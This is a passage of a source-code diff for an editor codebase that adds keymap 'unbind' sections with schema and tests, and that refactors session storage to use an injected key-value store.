SearchButton { fn set_active_pane_item( &mut self, - _active_pane_item: Option<&dyn ItemHandle>, + active_pane_item: Option<&dyn ItemHandle>, _window: &mut Window, - _cx: &mut Context, + cx: &mut Context, ) { + self.pane_item_focus_handle = active_pane_item.map(|item| item.item_focus_handle(cx)); } } diff --git a/crates/session/src/session.rs b/crates/session/src/session.rs index de6be034f9732f2c24dd860ebccd0c677d4fc623..76f2398b382cf1c1a6d2f8da687f7e352acb8c3b 100644 --- a/crates/session/src/session.rs +++ b/crates/session/src/session.rs @@ -1,4 +1,4 @@ -use db::kvp::KEY_VALUE_STORE; +use db::kvp::KeyValueStore; use gpui::{App, AppContext as _, Context, Subscription, Task, WindowId}; use util::ResultExt; @@ -12,20 +12,19 @@ const SESSION_ID_KEY: &str = "session_id"; const SESSION_WINDOW_STACK_KEY: &str = "session_window_stack"; impl 
Session { - pub async fn new(session_id: String) -> Self { - let old_session_id = KEY_VALUE_STORE.read_kvp(SESSION_ID_KEY).ok().flatten(); + pub async fn new(session_id: String, db: KeyValueStore) -> Self { + let old_session_id = db.read_kvp(SESSION_ID_KEY).ok().flatten(); - KEY_VALUE_STORE - .write_kvp(SESSION_ID_KEY.to_string(), session_id.clone()) + db.write_kvp(SESSION_ID_KEY.to_string(), session_id.clone()) .await .log_err(); - let old_window_ids = KEY_VALUE_STORE + let old_window_ids = db .read_kvp(SESSION_WINDOW_STACK_KEY) .ok() .flatten() .and_then(|json| serde_json::from_str::>(&json).ok()) - .map(|vec| { + .map(|vec: Vec| { vec.into_iter() .map(WindowId::from) .collect::>() @@ -72,25 +71,28 @@ impl AppSession { let _subscriptions = vec![cx.on_app_quit(Self::app_will_quit)]; #[cfg(not(any(test, feature = "test-support")))] - let _serialization_task = cx.spawn(async move |_, cx| { - // Disabled in tests: the infinite loop bypasses "parking forbidden" checks, - // causing tests to hang instead of panicking. - { - let mut current_window_stack = Vec::new(); - loop { - if let Some(windows) = cx.update(|cx| window_stack(cx)) - && windows != current_window_stack - { - store_window_stack(&windows).await; - current_window_stack = windows; + let _serialization_task = { + let db = KeyValueStore::global(cx); + cx.spawn(async move |_, cx| { + // Disabled in tests: the infinite loop bypasses "parking forbidden" checks, + // causing tests to hang instead of panicking. 
+ { + let mut current_window_stack = Vec::new(); + loop { + if let Some(windows) = cx.update(|cx| window_stack(cx)) + && windows != current_window_stack + { + store_window_stack(db.clone(), &windows).await; + current_window_stack = windows; + } + + cx.background_executor() + .timer(std::time::Duration::from_millis(500)) + .await; } - - cx.background_executor() - .timer(std::time::Duration::from_millis(500)) - .await; } - } - }); + }) + }; #[cfg(any(test, feature = "test-support"))] let _serialization_task = Task::ready(()); @@ -104,7 +106,8 @@ impl AppSession { fn app_will_quit(&mut self, cx: &mut Context) -> Task<()> { if let Some(window_stack) = window_stack(cx) { - cx.background_spawn(async move { store_window_stack(&window_stack).await }) + let db = KeyValueStore::global(cx); + cx.background_spawn(async move { store_window_stack(db, &window_stack).await }) } else { Task::ready(()) } @@ -137,10 +140,9 @@ fn window_stack(cx: &App) -> Option> { ) } -async fn store_window_stack(windows: &[u64]) { +async fn store_window_stack(db: KeyValueStore, windows: &[u64]) { if let Ok(window_ids_json) = serde_json::to_string(windows) { - KEY_VALUE_STORE - .write_kvp(SESSION_WINDOW_STACK_KEY.to_string(), window_ids_json) + db.write_kvp(SESSION_WINDOW_STACK_KEY.to_string(), window_ids_json) .await .log_err(); } diff --git a/crates/settings/Cargo.toml b/crates/settings/Cargo.toml index 27e8182d37ba1c67700d3a41dbdfc1c4ce27e4d6..a0d75e5b76fd4a0066ff606585088f61a23d19a1 100644 --- a/crates/settings/Cargo.toml +++ b/crates/settings/Cargo.toml @@ -27,7 +27,7 @@ log.workspace = true migrator.workspace = true paths.workspace = true release_channel.workspace = true -rust-embed = { workspace = true, features = ["debug-embed"] } +rust-embed.workspace = true schemars.workspace = true serde.workspace = true serde_json.workspace = true diff --git a/crates/settings/src/keymap_file.rs b/crates/settings/src/keymap_file.rs index 
67f41b14521480e7082f4070db0ed50d4dfdc1fe..f4529e305a4428b1ab9ead8671542108b963216b 100644 --- a/crates/settings/src/keymap_file.rs +++ b/crates/settings/src/keymap_file.rs @@ -4,7 +4,7 @@ use fs::Fs; use gpui::{ Action, ActionBuildError, App, InvalidKeystrokeError, KEYSTROKE_PARSE_EXPECTED_MESSAGE, KeyBinding, KeyBindingContextPredicate, KeyBindingMetaIndex, KeybindingKeystroke, Keystroke, - NoAction, SharedString, generate_list_of_all_registered_actions, register_action, + NoAction, SharedString, Unbind, generate_list_of_all_registered_actions, register_action, }; use schemars::{JsonSchema, json_schema}; use serde::Deserialize; @@ -73,6 +73,10 @@ pub struct KeymapSection { /// on macOS. See the documentation for more details. #[serde(default)] use_key_equivalents: bool, + /// This keymap section's unbindings, as a JSON object mapping keystrokes to actions. These are + /// parsed before `bindings`, so bindings later in the same section can still take precedence. + #[serde(default)] + unbind: Option>, /// This keymap section's bindings, as a JSON object mapping keystrokes to actions. The /// keystrokes key is a string representing a sequence of keystrokes to type, where the /// keystrokes are separated by whitespace. 
Each keystroke is a sequence of modifiers (`ctrl`, @@ -135,6 +139,20 @@ impl JsonSchema for KeymapAction { } } +#[derive(Debug, Deserialize, Default, Clone)] +#[serde(transparent)] +pub struct UnbindTargetAction(Value); + +impl JsonSchema for UnbindTargetAction { + fn schema_name() -> Cow<'static, str> { + "UnbindTargetAction".into() + } + + fn json_schema(_: &mut schemars::SchemaGenerator) -> schemars::Schema { + json_schema!(true) + } +} + #[derive(Debug)] #[must_use] pub enum KeymapFileLoadResult { @@ -231,6 +249,7 @@ impl KeymapFile { for KeymapSection { context, use_key_equivalents, + unbind, bindings, unrecognized_fields, } in keymap_file.0.iter() @@ -244,7 +263,7 @@ impl KeymapFile { // Leading space is to separate from the message indicating which section // the error occurred in. errors.push(( - context, + context.clone(), format!(" Parse error in section `context` field: {}", err), )); continue; @@ -263,6 +282,38 @@ impl KeymapFile { .unwrap(); } + if let Some(unbind) = unbind { + for (keystrokes, action) in unbind { + let result = Self::load_unbinding( + keystrokes, + action, + context_predicate.clone(), + *use_key_equivalents, + cx, + ); + match result { + Ok(key_binding) => { + key_bindings.push(key_binding); + } + Err(err) => { + let mut lines = err.lines(); + let mut indented_err = lines.next().unwrap().to_string(); + for line in lines { + indented_err.push_str(" "); + indented_err.push_str(line); + indented_err.push_str("\n"); + } + write!( + section_errors, + "\n\n- In unbind {}, {indented_err}", + MarkdownInlineCode(&format!("\"{}\"", keystrokes)) + ) + .unwrap(); + } + } + } + } + if let Some(bindings) = bindings { for (keystrokes, action) in bindings { let result = Self::load_keybinding( @@ -296,7 +347,7 @@ impl KeymapFile { } if !section_errors.is_empty() { - errors.push((context, section_errors)) + errors.push((context.clone(), section_errors)) } } @@ -332,7 +383,17 @@ impl KeymapFile { use_key_equivalents: bool, cx: &App, ) -> 
std::result::Result { - let (action, action_input_string) = Self::build_keymap_action(action, cx)?; + Self::load_keybinding_action_value(keystrokes, &action.0, context, use_key_equivalents, cx) + } + + fn load_keybinding_action_value( + keystrokes: &str, + action: &Value, + context: Option>, + use_key_equivalents: bool, + cx: &App, + ) -> std::result::Result { + let (action, action_input_string) = Self::build_keymap_action_value(action, cx)?; let key_binding = match KeyBinding::load( keystrokes, @@ -362,23 +423,70 @@ impl KeymapFile { } } + fn load_unbinding( + keystrokes: &str, + action: &UnbindTargetAction, + context: Option>, + use_key_equivalents: bool, + cx: &App, + ) -> std::result::Result { + let key_binding = Self::load_keybinding_action_value( + keystrokes, + &action.0, + context, + use_key_equivalents, + cx, + )?; + + if key_binding.action().partial_eq(&NoAction) { + return Err("expected action name string or [name, input] array.".to_string()); + } + + if key_binding.action().name() == Unbind::name_for_type() { + return Err(format!( + "can't use {} as an unbind target.", + MarkdownInlineCode(&format!("\"{}\"", Unbind::name_for_type())) + )); + } + + KeyBinding::load( + keystrokes, + Box::new(Unbind(key_binding.action().name().into())), + key_binding.predicate(), + use_key_equivalents, + key_binding.action_input(), + cx.keyboard_mapper().as_ref(), + ) + .map_err(|InvalidKeystrokeError { keystroke }| { + format!( + "invalid keystroke {}. {}", + MarkdownInlineCode(&format!("\"{}\"", &keystroke)), + KEYSTROKE_PARSE_EXPECTED_MESSAGE + ) + }) + } + pub fn parse_action( action: &KeymapAction, ) -> Result)>, String> { - let name_and_input = match &action.0 { + Self::parse_action_value(&action.0) + } + + fn parse_action_value(action: &Value) -> Result)>, String> { + let name_and_input = match action { Value::Array(items) => { if items.len() != 2 { return Err(format!( "expected two-element array of `[name, input]`. 
\ Instead found {}.", - MarkdownInlineCode(&action.0.to_string()) + MarkdownInlineCode(&action.to_string()) )); } let serde_json::Value::String(ref name) = items[0] else { return Err(format!( "expected two-element array of `[name, input]`, \ but the first element is not a string in {}.", - MarkdownInlineCode(&action.0.to_string()) + MarkdownInlineCode(&action.to_string()) )); }; Some((name, Some(&items[1]))) @@ -389,7 +497,7 @@ impl KeymapFile { return Err(format!( "expected two-element array of `[name, input]`. \ Instead found {}.", - MarkdownInlineCode(&action.0.to_string()) + MarkdownInlineCode(&action.to_string()) )); } }; @@ -400,7 +508,14 @@ impl KeymapFile { action: &KeymapAction, cx: &App, ) -> std::result::Result<(Box, Option), String> { - let (build_result, action_input_string) = match Self::parse_action(action)? { + Self::build_keymap_action_value(&action.0, cx) + } + + fn build_keymap_action_value( + action: &Value, + cx: &App, + ) -> std::result::Result<(Box, Option), String> { + let (build_result, action_input_string) = match Self::parse_action_value(action)? 
{ Some((name, action_input)) if name.as_str() == ActionSequence::name_for_type() => { match action_input { Some(action_input) => ( @@ -583,9 +698,15 @@ impl KeymapFile { "minItems": 2, "maxItems": 2 }); - let mut keymap_action_alternatives = vec![empty_action_name, empty_action_name_with_input]; + let mut keymap_action_alternatives = vec![ + empty_action_name.clone(), + empty_action_name_with_input.clone(), + ]; + let mut unbind_target_action_alternatives = + vec![empty_action_name, empty_action_name_with_input]; let mut empty_schema_action_names = vec![]; + let mut empty_schema_unbind_target_action_names = vec![]; for (name, action_schema) in action_schemas.into_iter() { let deprecation = if name == NoAction.name() { Some("null") @@ -593,6 +714,9 @@ impl KeymapFile { deprecations.get(name).copied() }; + let include_in_unbind_target_schema = + name != NoAction.name() && name != Unbind::name_for_type(); + // Add an alternative for plain action names. let mut plain_action = json_schema!({ "type": "string", @@ -607,7 +731,10 @@ impl KeymapFile { if let Some(description) = &description { add_description(&mut plain_action, description); } - keymap_action_alternatives.push(plain_action); + keymap_action_alternatives.push(plain_action.clone()); + if include_in_unbind_target_schema { + unbind_target_action_alternatives.push(plain_action); + } // Add an alternative for actions with data specified as a [name, data] array. 
// @@ -633,9 +760,15 @@ impl KeymapFile { "minItems": 2, "maxItems": 2 }); - keymap_action_alternatives.push(action_with_input); + keymap_action_alternatives.push(action_with_input.clone()); + if include_in_unbind_target_schema { + unbind_target_action_alternatives.push(action_with_input); + } } else { empty_schema_action_names.push(name); + if include_in_unbind_target_schema { + empty_schema_unbind_target_action_names.push(name); + } } } @@ -659,20 +792,44 @@ impl KeymapFile { keymap_action_alternatives.push(actions_with_empty_input); } + if !empty_schema_unbind_target_action_names.is_empty() { + let action_names = json_schema!({ "enum": empty_schema_unbind_target_action_names }); + let no_properties_allowed = json_schema!({ + "type": "object", + "additionalProperties": false + }); + let mut actions_with_empty_input = json_schema!({ + "type": "array", + "items": [action_names, no_properties_allowed], + "minItems": 2, + "maxItems": 2 + }); + add_deprecation( + &mut actions_with_empty_input, + "This action does not take input - just the action name string should be used." + .to_string(), + ); + unbind_target_action_alternatives.push(actions_with_empty_input); + } + // Placing null first causes json-language-server to default assuming actions should be // null, so place it last. keymap_action_alternatives.push(json_schema!({ "type": "null" })); - // The `KeymapSection` schema will reference the `KeymapAction` schema by name, so setting - // the definition of `KeymapAction` results in the full action schema being used. 
generator.definitions_mut().insert( KeymapAction::schema_name().to_string(), json!({ "anyOf": keymap_action_alternatives }), ); + generator.definitions_mut().insert( + UnbindTargetAction::schema_name().to_string(), + json!({ + "anyOf": unbind_target_action_alternatives + }), + ); generator.root_schema_for::().to_value() } @@ -701,31 +858,32 @@ impl KeymapFile { tab_size: usize, keyboard_mapper: &dyn gpui::PlatformKeyboardMapper, ) -> Result { - match operation { + // When replacing or removing a non-user binding, we may need to write an unbind entry + // to suppress the original default binding. + let mut suppression_unbind: Option> = None; + + match &operation { // if trying to replace a keybinding that is not user-defined, treat it as an add operation KeybindUpdateOperation::Replace { target_keybind_source: target_source, source, target, - } if target_source != KeybindSource::User => { + } if *target_source != KeybindSource::User => { + if target.keystrokes_unparsed() != source.keystrokes_unparsed() { + suppression_unbind = Some(target.clone()); + } operation = KeybindUpdateOperation::Add { - source, - from: Some(target), + source: source.clone(), + from: Some(target.clone()), }; } - // if trying to remove a keybinding that is not user-defined, treat it as creating a binding - // that binds it to `zed::NoAction` + // if trying to remove a keybinding that is not user-defined, treat it as creating an + // unbind entry for the removed action KeybindUpdateOperation::Remove { target, target_keybind_source, - } if target_keybind_source != KeybindSource::User => { - let mut source = target.clone(); - source.action_name = gpui::NoAction.name(); - source.action_arguments.take(); - operation = KeybindUpdateOperation::Add { - source, - from: Some(target), - }; + } if *target_keybind_source != KeybindSource::User => { + suppression_unbind = Some(target.clone()); } _ => {} } @@ -734,34 +892,41 @@ impl KeymapFile { // We don't want to modify the file if it's invalid. 
let keymap = Self::parse(&keymap_contents).context("Failed to parse keymap")?; - if let KeybindUpdateOperation::Remove { target, .. } = operation { - let target_action_value = target - .action_value() - .context("Failed to generate target action JSON value")?; - let Some((index, keystrokes_str)) = - find_binding(&keymap, &target, &target_action_value, keyboard_mapper) - else { - anyhow::bail!("Failed to find keybinding to remove"); - }; - let is_only_binding = keymap.0[index] - .bindings - .as_ref() - .is_none_or(|bindings| bindings.len() == 1); - let key_path: &[&str] = if is_only_binding { - &[] - } else { - &["bindings", keystrokes_str] - }; - let (replace_range, replace_value) = replace_top_level_array_value_in_json_text( - &keymap_contents, - key_path, - None, - None, - index, - tab_size, - ); - keymap_contents.replace_range(replace_range, &replace_value); - return Ok(keymap_contents); + if let KeybindUpdateOperation::Remove { + target, + target_keybind_source, + } = &operation + { + if *target_keybind_source == KeybindSource::User { + let target_action_value = target + .action_value() + .context("Failed to generate target action JSON value")?; + let Some(binding_location) = + find_binding(&keymap, target, &target_action_value, keyboard_mapper) + else { + anyhow::bail!("Failed to find keybinding to remove"); + }; + let is_only_binding = binding_location.is_only_entry_in_section(&keymap); + let key_path: &[&str] = if is_only_binding { + &[] + } else { + &[ + binding_location.kind.key_path(), + binding_location.keystrokes_str, + ] + }; + let (replace_range, replace_value) = replace_top_level_array_value_in_json_text( + &keymap_contents, + key_path, + None, + None, + binding_location.index, + tab_size, + ); + keymap_contents.replace_range(replace_range, &replace_value); + + return Ok(keymap_contents); + } } if let KeybindUpdateOperation::Replace { source, target, .. 
} = operation { @@ -772,7 +937,7 @@ impl KeymapFile { .action_value() .context("Failed to generate source action JSON value")?; - if let Some((index, keystrokes_str)) = + if let Some(binding_location) = find_binding(&keymap, &target, &target_action_value, keyboard_mapper) { if target.context == source.context { @@ -781,30 +946,32 @@ impl KeymapFile { let (replace_range, replace_value) = replace_top_level_array_value_in_json_text( &keymap_contents, - &["bindings", keystrokes_str], + &[ + binding_location.kind.key_path(), + binding_location.keystrokes_str, + ], Some(&source_action_value), Some(&source.keystrokes_unparsed()), - index, + binding_location.index, tab_size, ); keymap_contents.replace_range(replace_range, &replace_value); return Ok(keymap_contents); - } else if keymap.0[index] - .bindings - .as_ref() - .is_none_or(|bindings| bindings.len() == 1) - { + } else if binding_location.is_only_entry_in_section(&keymap) { // if we are replacing the only binding in the section, // just update the section in place, updating the context // and the binding let (replace_range, replace_value) = replace_top_level_array_value_in_json_text( &keymap_contents, - &["bindings", keystrokes_str], + &[ + binding_location.kind.key_path(), + binding_location.keystrokes_str, + ], Some(&source_action_value), Some(&source.keystrokes_unparsed()), - index, + binding_location.index, tab_size, ); keymap_contents.replace_range(replace_range, &replace_value); @@ -814,7 +981,7 @@ impl KeymapFile { &["context"], source.context.map(Into::into).as_ref(), None, - index, + binding_location.index, tab_size, ); keymap_contents.replace_range(replace_range, &replace_value); @@ -827,10 +994,13 @@ impl KeymapFile { let (replace_range, replace_value) = replace_top_level_array_value_in_json_text( &keymap_contents, - &["bindings", keystrokes_str], + &[ + binding_location.kind.key_path(), + binding_location.keystrokes_str, + ], None, None, - index, + binding_location.index, tab_size, ); 
keymap_contents.replace_range(replace_range, &replace_value); @@ -865,8 +1035,9 @@ impl KeymapFile { } let use_key_equivalents = from.and_then(|from| { let action_value = from.action_value().context("Failed to serialize action value. `use_key_equivalents` on new keybinding may be incorrect.").log_err()?; - let (index, _) = find_binding(&keymap, &from, &action_value, keyboard_mapper)?; - Some(keymap.0[index].use_key_equivalents) + let binding_location = + find_binding(&keymap, &from, &action_value, keyboard_mapper)?; + Some(keymap.0[binding_location.index].use_key_equivalents) }).unwrap_or(false); if use_key_equivalents { value.insert("use_key_equivalents".to_string(), true.into()); @@ -886,6 +1057,28 @@ impl KeymapFile { ); keymap_contents.replace_range(replace_range, &replace_value); } + + if let Some(suppression_unbind) = suppression_unbind { + let mut value = serde_json::Map::with_capacity(2); + if let Some(context) = suppression_unbind.context { + value.insert("context".to_string(), context.into()); + } + value.insert("unbind".to_string(), { + let mut unbind = serde_json::Map::new(); + unbind.insert( + suppression_unbind.keystrokes_unparsed(), + suppression_unbind.action_value()?, + ); + unbind.into() + }); + let (replace_range, replace_value) = append_top_level_array_value_in_json_text( + &keymap_contents, + &value.into(), + tab_size, + ); + keymap_contents.replace_range(replace_range, &replace_value); + } + return Ok(keymap_contents); fn find_binding<'a, 'b>( @@ -893,7 +1086,7 @@ impl KeymapFile { target: &KeybindUpdateTarget<'a>, target_action_value: &Value, keyboard_mapper: &dyn gpui::PlatformKeyboardMapper, - ) -> Option<(usize, &'b str)> { + ) -> Option> { let target_context_parsed = KeyBindingContextPredicate::parse(target.context.unwrap_or("")).ok(); for (index, section) in keymap.sections().enumerate() { @@ -902,40 +1095,108 @@ impl KeymapFile { if section_context_parsed != target_context_parsed { continue; } - let Some(bindings) = §ion.bindings else { 
+ + if let Some(binding_location) = find_binding_in_entries( + section.bindings.as_ref(), + BindingKind::Binding, + index, + target, + target_action_value, + keyboard_mapper, + |action| &action.0, + ) { + return Some(binding_location); + } + + if let Some(binding_location) = find_binding_in_entries( + section.unbind.as_ref(), + BindingKind::Unbind, + index, + target, + target_action_value, + keyboard_mapper, + |action| &action.0, + ) { + return Some(binding_location); + } + } + None + } + + fn find_binding_in_entries<'a, 'b, T>( + entries: Option<&'b IndexMap>, + kind: BindingKind, + index: usize, + target: &KeybindUpdateTarget<'a>, + target_action_value: &Value, + keyboard_mapper: &dyn gpui::PlatformKeyboardMapper, + action_value: impl Fn(&T) -> &Value, + ) -> Option> { + let entries = entries?; + for (keystrokes_str, action) in entries { + let Ok(keystrokes) = keystrokes_str + .split_whitespace() + .map(|source| { + let keystroke = Keystroke::parse(source)?; + Ok(KeybindingKeystroke::new_with_mapper( + keystroke, + false, + keyboard_mapper, + )) + }) + .collect::, InvalidKeystrokeError>>() + else { continue; }; - for (keystrokes_str, action) in bindings { - let Ok(keystrokes) = keystrokes_str - .split_whitespace() - .map(|source| { - let keystroke = Keystroke::parse(source)?; - Ok(KeybindingKeystroke::new_with_mapper( - keystroke, - false, - keyboard_mapper, - )) - }) - .collect::, InvalidKeystrokeError>>() - else { - continue; - }; - if keystrokes.len() != target.keystrokes.len() - || !keystrokes - .iter() - .zip(target.keystrokes) - .all(|(a, b)| a.inner().should_match(b)) - { - continue; - } - if &action.0 != target_action_value { - continue; - } - return Some((index, keystrokes_str)); + if keystrokes.len() != target.keystrokes.len() + || !keystrokes + .iter() + .zip(target.keystrokes) + .all(|(a, b)| a.inner().should_match(b)) + { + continue; } + if action_value(action) != target_action_value { + continue; + } + return Some(BindingLocation { + index, + kind, 
+ keystrokes_str, + }); } None } + + #[derive(Copy, Clone)] + enum BindingKind { + Binding, + Unbind, + } + + impl BindingKind { + fn key_path(self) -> &'static str { + match self { + Self::Binding => "bindings", + Self::Unbind => "unbind", + } + } + } + + struct BindingLocation<'a> { + index: usize, + kind: BindingKind, + keystrokes_str: &'a str, + } + + impl BindingLocation<'_> { + fn is_only_entry_in_section(&self, keymap: &KeymapFile) -> bool { + let section = &keymap.0[self.index]; + let binding_count = section.bindings.as_ref().map_or(0, IndexMap::len); + let unbind_count = section.unbind.as_ref().map_or(0, IndexMap::len); + binding_count + unbind_count == 1 + } + } } } @@ -1228,7 +1489,8 @@ impl Action for ActionSequence { #[cfg(test)] mod tests { - use gpui::{DummyKeyboardMapper, KeybindingKeystroke, Keystroke}; + use gpui::{Action, App, DummyKeyboardMapper, KeybindingKeystroke, Keystroke, Unbind}; + use serde_json::Value; use unindent::Unindent; use crate::{ @@ -1236,6 +1498,8 @@ mod tests { keymap_file::{KeybindUpdateOperation, KeybindUpdateTarget}, }; + gpui::actions!(test_keymap_file, [StringAction, InputAction]); + #[test] fn can_deserialize_keymap_with_trailing_comma() { let json = indoc::indoc! {"[ @@ -1251,6 +1515,191 @@ mod tests { KeymapFile::parse(json).unwrap(); } + #[gpui::test] + fn keymap_section_unbinds_are_loaded_before_bindings(cx: &mut App) { + let key_bindings = match KeymapFile::load( + indoc::indoc! {r#" + [ + { + "unbind": { + "ctrl-a": "test_keymap_file::StringAction", + "ctrl-b": ["test_keymap_file::InputAction", {}] + }, + "bindings": { + "ctrl-c": "test_keymap_file::StringAction" + } + } + ] + "#}, + cx, + ) { + crate::keymap_file::KeymapFileLoadResult::Success { key_bindings } => key_bindings, + crate::keymap_file::KeymapFileLoadResult::SomeFailedToLoad { + error_message, .. 
+ } => { + panic!("{error_message}"); + } + crate::keymap_file::KeymapFileLoadResult::JsonParseFailure { error } => { + panic!("JSON parse error: {error}"); + } + }; + + assert_eq!(key_bindings.len(), 3); + assert!( + key_bindings[0] + .action() + .partial_eq(&Unbind("test_keymap_file::StringAction".into())) + ); + assert_eq!(key_bindings[0].action_input(), None); + assert!( + key_bindings[1] + .action() + .partial_eq(&Unbind("test_keymap_file::InputAction".into())) + ); + assert_eq!( + key_bindings[1] + .action_input() + .as_ref() + .map(ToString::to_string), + Some("{}".to_string()) + ); + assert_eq!( + key_bindings[2].action().name(), + "test_keymap_file::StringAction" + ); + } + + #[gpui::test] + fn keymap_unbind_loads_valid_target_action_with_input(cx: &mut App) { + let key_bindings = match KeymapFile::load( + indoc::indoc! {r#" + [ + { + "unbind": { + "ctrl-a": ["test_keymap_file::InputAction", {}] + } + } + ] + "#}, + cx, + ) { + crate::keymap_file::KeymapFileLoadResult::Success { key_bindings } => key_bindings, + other => panic!("expected Success, got {other:?}"), + }; + + assert_eq!(key_bindings.len(), 1); + assert!( + key_bindings[0] + .action() + .partial_eq(&Unbind("test_keymap_file::InputAction".into())) + ); + assert_eq!( + key_bindings[0] + .action_input() + .as_ref() + .map(ToString::to_string), + Some("{}".to_string()) + ); + } + + #[gpui::test] + fn keymap_unbind_rejects_null(cx: &mut App) { + match KeymapFile::load( + indoc::indoc! {r#" + [ + { + "unbind": { + "ctrl-a": null + } + } + ] + "#}, + cx, + ) { + crate::keymap_file::KeymapFileLoadResult::SomeFailedToLoad { + key_bindings, + error_message, + } => { + assert!(key_bindings.is_empty()); + assert!( + error_message + .0 + .contains("expected action name string or [name, input] array.") + ); + } + other => panic!("expected SomeFailedToLoad, got {other:?}"), + } + } + + #[gpui::test] + fn keymap_unbind_rejects_unbind_action(cx: &mut App) { + match KeymapFile::load( + indoc::indoc! 
{r#" + [ + { + "unbind": { + "ctrl-a": ["zed::Unbind", "test_keymap_file::StringAction"] + } + } + ] + "#}, + cx, + ) { + crate::keymap_file::KeymapFileLoadResult::SomeFailedToLoad { + key_bindings, + error_message, + } => { + assert!(key_bindings.is_empty()); + assert!( + error_message + .0 + .contains("can't use `\"zed::Unbind\"` as an unbind target.") + ); + } + other => panic!("expected SomeFailedToLoad, got {other:?}"), + } + } + + #[test] + fn keymap_schema_for_unbind_excludes_null_and_unbind_action() { + fn schema_allows(schema: &Value, expected: &Value) -> bool { + match schema { + Value::Object(object) => { + if object.get("const") == Some(expected) { + return true; + } + if object.get("type") == Some(&Value::String("null".to_string())) + && expected == &Value::Null + { + return true; + } + object.values().any(|value| schema_allows(value, expected)) + } + Value::Array(items) => items.iter().any(|value| schema_allows(value, expected)), + _ => false, + } + } + + let schema = KeymapFile::generate_json_schema_from_inventory(); + let unbind_schema = schema + .pointer("/$defs/UnbindTargetAction") + .expect("missing UnbindTargetAction schema"); + + assert!(!schema_allows(unbind_schema, &Value::Null)); + assert!(!schema_allows( + unbind_schema, + &Value::String(Unbind::name_for_type().to_string()) + )); + assert!(schema_allows( + unbind_schema, + &Value::String("test_keymap_file::StringAction".to_string()) + )); + assert!(schema_allows( + unbind_schema, + &Value::String("test_keymap_file::InputAction".to_string()) + )); + } + #[track_caller] fn check_keymap_update( input: impl ToString, @@ -1479,6 +1928,102 @@ mod tests { } ] } + }, + { + "unbind": { + "ctrl-a": "zed::SomeAction" + } + } + ]"# + .unindent(), + ); + + // Replacing a non-user binding without changing the keystroke should + // not produce an unbind suppression entry. 
+ check_keymap_update( + r#"[ + { + "bindings": { + "ctrl-a": "zed::SomeAction" + } + } + ]"# + .unindent(), + KeybindUpdateOperation::Replace { + target: KeybindUpdateTarget { + keystrokes: &parse_keystrokes("ctrl-a"), + action_name: "zed::SomeAction", + context: None, + action_arguments: None, + }, + source: KeybindUpdateTarget { + keystrokes: &parse_keystrokes("ctrl-a"), + action_name: "zed::SomeOtherAction", + context: None, + action_arguments: None, + }, + target_keybind_source: KeybindSource::Base, + }, + r#"[ + { + "bindings": { + "ctrl-a": "zed::SomeAction" + } + }, + { + "bindings": { + "ctrl-a": "zed::SomeOtherAction" + } + } + ]"# + .unindent(), + ); + + // Replacing a non-user binding with a context and a keystroke change + // should produce a suppression entry that preserves the context. + check_keymap_update( + r#"[ + { + "context": "SomeContext", + "bindings": { + "ctrl-a": "zed::SomeAction" + } + } + ]"# + .unindent(), + KeybindUpdateOperation::Replace { + target: KeybindUpdateTarget { + keystrokes: &parse_keystrokes("ctrl-a"), + action_name: "zed::SomeAction", + context: Some("SomeContext"), + action_arguments: None, + }, + source: KeybindUpdateTarget { + keystrokes: &parse_keystrokes("ctrl-b"), + action_name: "zed::SomeOtherAction", + context: Some("SomeContext"), + action_arguments: None, + }, + target_keybind_source: KeybindSource::Default, + }, + r#"[ + { + "context": "SomeContext", + "bindings": { + "ctrl-a": "zed::SomeAction" + } + }, + { + "context": "SomeContext", + "bindings": { + "ctrl-b": "zed::SomeOtherAction" + } + }, + { + "context": "SomeContext", + "unbind": { + "ctrl-a": "zed::SomeAction" + } } ]"# .unindent(), @@ -1974,8 +2519,11 @@ mod tests { }, { "context": "SomeContext", - "bindings": { - "a": null + "unbind": { + "a": [ + "foo::baz", + true + ] } } ]"# diff --git a/crates/settings/src/settings.rs b/crates/settings/src/settings.rs index 9049c95eb9529b9a490687e1130af273b7496970..1b75f9395e4f46ec5fd20231956d232c26005107 100644 
--- a/crates/settings/src/settings.rs +++ b/crates/settings/src/settings.rs @@ -44,9 +44,9 @@ pub use keymap_file::{ pub use settings_file::*; pub use settings_json::*; pub use settings_store::{ - InvalidSettingsError, LSP_SETTINGS_SCHEMA_URL_PREFIX, LocalSettingsKind, LocalSettingsPath, - MigrationStatus, Settings, SettingsFile, SettingsJsonSchemaParams, SettingsKey, - SettingsLocation, SettingsParseResult, SettingsStore, + DefaultSemanticTokenRules, InvalidSettingsError, LSP_SETTINGS_SCHEMA_URL_PREFIX, + LocalSettingsKind, LocalSettingsPath, MigrationStatus, Settings, SettingsFile, + SettingsJsonSchemaParams, SettingsKey, SettingsLocation, SettingsParseResult, SettingsStore, }; pub use vscode_import::{VsCodeSettings, VsCodeSettingsSource}; @@ -59,13 +59,13 @@ pub struct ActiveSettingsProfileName(pub String); impl Global for ActiveSettingsProfileName {} pub trait UserSettingsContentExt { - fn for_profile(&self, cx: &App) -> Option<&SettingsContent>; + fn for_profile(&self, cx: &App) -> Option<&SettingsProfile>; fn for_release_channel(&self) -> Option<&SettingsContent>; fn for_os(&self) -> Option<&SettingsContent>; } impl UserSettingsContentExt for UserSettingsContent { - fn for_profile(&self, cx: &App) -> Option<&SettingsContent> { + fn for_profile(&self, cx: &App) -> Option<&SettingsProfile> { let Some(active_profile) = cx.try_global::() else { return None; }; diff --git a/crates/settings/src/settings_file.rs b/crates/settings/src/settings_file.rs index f5d0b973340db70819b2b19ae1352a4e1567d670..87ab85aae595faf9a69c45b77d98ea1230ea5162 100644 --- a/crates/settings/src/settings_file.rs +++ b/crates/settings/src/settings_file.rs @@ -5,6 +5,61 @@ use futures::{StreamExt, channel::mpsc}; use gpui::{App, BackgroundExecutor, ReadGlobal}; use std::{path::PathBuf, sync::Arc, time::Duration}; +#[cfg(test)] +mod tests { + use super::*; + use fs::FakeFs; + + use gpui::TestAppContext; + use serde_json::json; + use std::path::Path; + + #[gpui::test] + async fn 
